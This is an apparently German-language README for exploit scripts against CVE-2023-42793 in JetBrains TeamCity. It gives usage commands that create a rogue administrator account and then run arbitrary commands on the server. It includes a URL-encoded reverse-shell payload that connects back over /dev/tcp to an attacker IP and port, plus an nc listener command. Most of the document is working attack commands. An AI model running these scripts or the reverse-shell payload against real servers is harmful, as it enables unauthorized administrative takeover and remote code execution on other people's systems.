
JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793
Verwende zuerst
exploit.py, um ein Administratorkonto zu erstellen, und verwende dannrce.py, um Befehle auf dem Ziel auszuführen. Für eine Reverse Shell siehe hier
Dieses Skript nutzt CVE-2023-42793 aus, um ein Administratorkonto auf einem TeamCity-Server zu erstellen. Es sendet eine POST-Anfrage an die Ziel-URL, um einen Admin-Benutzer mit angegebenen oder zufälligen Anmeldedaten zu erstellen.
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
-u, --url URL: Ziel-URL (erforderlich)-v, --verbose: Ausführlichen Modus aktivieren-n, --username USERNAME: Benutzernamen angeben (Standard: zufällig)-p, --password PASSWORD: Passwort angeben (Standard: zufällig)-e, --email EMAIL: E-Mail angeben (Standard: zufällig)-t, --token-file: Datei zum Speichern des Tokenspip3 install -r requirements.txtExploit mit zufälligem Benutzernamen, Passwort und E-Mail:
python exploit.py -u http://target.com
Exploit mit angegebenem Benutzernamen, Passwort und E-Mail:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
Bei erfolgreicher Ausnutzung gibt das Skript die URL, den Benutzernamen und das Passwort des erstellten Administratorkontos aus und speichert die Ausgabe in der Token-Datei.
Dieses Skript ermöglicht die Ausführung von Befehlen auf einem anfälligen TeamCity-Server unter Ausnutzung von CVE-2023-42793. Es aktiviert zunächst die Debug-Prozesse und führt dann den angegebenen Befehl über die entsprechenden API-Endpunkte aus.
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
-u, --url URL : Ziel-URL (erforderlich)-t, --token-file : Datei angeben, die das Token enthält-c, --command COMMAND: Auszuführenden Befehl angeben (RCE)-P, --port PORT: Port angeben (Standard ist 80)Exploit mit einem angegebenen Befehl:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555